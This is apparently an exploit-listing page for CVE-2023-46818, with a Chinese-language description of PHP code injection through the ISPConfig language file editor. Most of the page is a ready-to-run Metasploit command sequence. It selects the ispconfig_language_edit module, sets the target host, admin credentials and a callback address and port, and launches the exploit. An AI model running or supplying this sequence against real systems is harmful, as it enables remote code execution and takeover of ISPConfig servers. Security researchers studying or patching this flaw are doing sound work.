## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SYFI-CVE-2023-46818
# Metasploit 模块
Metasploit 模块

root@kitploit:~
use exploit/linux/http/ispconfig_language_edit
set RHOSTS target.com
set USERNAME admin
set PASSWORD password123
set LHOST 127.0.0.1
set LPORT 4444
exploit
在 ISPConfig 3.2.11p1 之前版本中发现了一个问题。如果启用了 admin_allow_langedit,管理员可以通过语言文件编辑器实现 PHP 代码注入。